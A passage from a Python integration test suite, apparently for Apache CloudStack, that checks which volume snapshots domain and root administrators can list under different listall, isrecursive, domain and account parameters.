cls.apiclient.connection.securityKey = cls.user_d2a_secretkey
cls.vm_d2 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD2A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d2_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d2.id)
cls.vm_d2_snapshot = Snapshot.create(cls.apiclient, cls.vm_d2_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_a_apikey
cls.apiclient.connection.securityKey = cls.user_a_secretkey
cls.vm_a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmROOTA"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_a.id)
cls.vm_a_snapshot = Snapshot.create(cls.apiclient, cls.vm_a_volume[0].id)
cls.cleanup = [
cls.account_a,
cls.service_offering,
]
except Exception as e:
cls.domain_2.delete(cls.apiclient, cleanup="true")
cls.domain_1.delete(cls.apiclient, cleanup="true")
cleanup_resources(cls.apiclient, cls.cleanup)
raise Exception("Failed to create the setup required to execute the test cases: %s" % e)
@classmethod
def tearDownClass(cls):
cls.apiclient = super(TestSnapshotList, cls).getClsTestClient().getApiClient()
cls.apiclient.connection.apiKey = cls.default_apikey
cls.apiclient.connection.securityKey = cls.default_secretkey
try:
cls.domain_2.delete(cls.apiclient, cleanup="true")
cls.domain_1.delete(cls.apiclient, cleanup="true")
except:
pass
cleanup_resources(cls.apiclient, cls.cleanup)
def setUp(cls):
cls.apiclient = cls.testClient.getApiClient()
cls.dbclient = cls.testClient.getDbConnection()
def tearDown(cls):
# restore back default apikey and secretkey
cls.apiclient.connection.apiKey = cls.default_apikey
cls.apiclient.connection.securityKey = cls.default_secretkey
return
## Domain Admin - Test cases with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by accounts in this domain and all its subdomain
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as Domain Admin - listall=true - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing listall="true"i and isrecusriv="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by accounts in this domain and all its subdomain
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as Domain Admin - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusriv="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by accounts in this domain and all its subdomain
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
self.debug("List as Domain Admin - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 9,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false(self):
"""
Test listing of Snapshots by passing listall="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as Domain Admin - listall=false - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as Domain Admin - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as Domain Admin - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases without passing listall paramter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin(self):
"""
Test listing of Snapshots by passing no parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as Domain Admin - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_rec_true(self):
"""
Test listing of Snapshots by passing isrecusrive="true" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as Domain Admin - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_true_rec_false(self):
"""
Test listing of Snapshots by passing isrecusrive="false" parameter as domain admin
Validate that it returns all the Snapshots that is owned by the domain admin
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as Domain Admin - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainId and listall="true" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true")
self.debug("List as Domain Admin passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainId ,listall="true" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as Domain Admin passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="true" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as Domain Admin passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false")
self.debug("List as Domain Admin passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as Domain Admin passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as Domain Admin passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid(self):
"""
Test listing of Snapshots by passing domainId parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id)
self.debug("List as Domain Admin passing domainId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_rec_true(self):
"""
Test listing of Snapshots by passing domainId and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as Domain Admin passing domainId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_rec_false(self):
"""
Test listing of Snapshots by passing domainId and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as Domain Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when account and domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="true" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId , listall="true" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when account and domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="false" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId , listall="false" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when account and domainId is passed with listall not passed
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid(self):
"""
Test listing of Snapshots by passing account ,domainId parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id)
self.debug("List as Domain Admin passing domainId and accountId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and isrecursive="true" parameter as domain admin
# Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as ROOT Admin - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as ROOT Admin - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id),
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
